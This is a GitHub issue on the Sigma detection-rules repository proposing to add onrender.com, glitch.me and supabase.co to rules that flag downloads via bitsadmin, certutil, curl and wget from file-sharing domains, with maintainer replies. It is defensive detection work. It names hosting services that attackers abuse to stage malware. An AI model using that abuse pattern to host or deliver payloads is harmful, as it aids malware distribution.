Adding new hosting sites to downloading rules
omaramin17 opened this issue · 3 comments
Description of the Idea of the Rule:
It has been observed from the recently published Microsoft blog, the usage of multiple hosting sites such as onrender.com, glitch.me, and supabase.co for malware delivery, where they create a unique subdomain, such as test-project.onrender.com, and connect the project to their GitHub Pages to host malicious files, making these accessible from such subdomains
-> an example from onrender dashboard where i created a project called threat-test.onrender.com and connected it to my github page repository .
Adding these sites :
- onrender.com
- glitch.me
- supabase.co
to the following rules :
- win_bits_client_new_transfer_via_file_sharing_domains.yml
- proc_creation_win_bitsadmin_download_file_sharing_domains.yml
- create_stream_hash_file_sharing_domains_download_susp_extension.yml
- proc_creation_win_certutil_download_file_sharing_domains.yml
- proc_creation_win_wget_download_susp_file_sharing_domains
- create_stream_hash_file_sharing_domains_download_unusual_extension
- win_appxdeployment_server_susp_domains.yml
- proc_creation_win_curl_download_susp_file_sharing_domains.yml
- net_connection_win_binary_susp_com.yml
Public References
Welcome @omaramin17 👋
It looks like this is your first issue on the Sigma rules repository!
The following repository accepts issues related to false positives or 'rule ideas'.
If you're reporting an issue related to the pySigma library please consider submitting it here
If you're reporting an issue related to the deprecated sigmac library please consider submitting it here
Thanks for taking the time to open this issue, and welcome to the Sigma community! 😃
Thanks @omaramin17
I will get the rules updated as soon as I can.